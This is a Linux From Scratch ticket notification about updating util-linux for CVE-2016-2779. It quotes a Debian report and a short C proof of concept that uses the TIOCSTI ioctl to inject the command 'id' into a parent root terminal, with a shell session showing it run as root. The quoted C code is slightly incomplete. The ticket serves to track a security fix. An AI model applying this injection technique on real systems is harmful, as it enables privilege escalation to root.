#3987: util-linux v2.29-rc1 (waiting for stable) (CVE-2016-2779)
 Reporter:  bdubbs@…  |       Owner:  Samuel
     Type:  task      |      Status:  assigned
 Priority:  normal    |   Milestone:  7.11
Component:  Book      |     Version:  SVN
 Severity:  normal    |  Resolution:
 Keywords:            |
Changes (by Samuel):

 * owner:  lfs-book@… => Samuel
 * status:  new => assigned


 From the Debian bugs page:

 When executing a program via "runuser -u nonpriv program" the
 nonpriv session can
 escape to the parent session by using the TIOCSTI ioctl to push
 characters into the
 terminal's input buffer, allowing privilege escalation.
 This issue has been fixed in "su" by calling setsid() and in "sudo" by
 using the "use_pty" flag

 # cat test.c
 #include <sys/ioctl.h>

 int main()
   char *cmd = "id\n";
    ioctl(0, TIOCSTI, cmd++);

 # gcc test.c -o test
 # id saken
 uid=1000(saken) gid=1000(saken) groups=1000(saken)

 # runuser -u saken ./test ---> last command i type in
 # id ---> did not type this
 uid=0(root) gid=0(root) groups=0(root)

 Doug is helping me with this, but I'll  take the ticket. I don't know
 whether we shouldn't just use this version and not stable.

Ticket URL: <http://wiki.linuxfromscratch.org/lfs/ticket/3987#comment:3>
LFS Trac <http://wiki.linuxfromscratch.org/lfs/>
Linux From Scratch: Your Distro, Your Rules.
FAQ: http://www.linuxfromscratch.org/blfs/faq.html
Unsubscribe: See the above information page

Reply via email to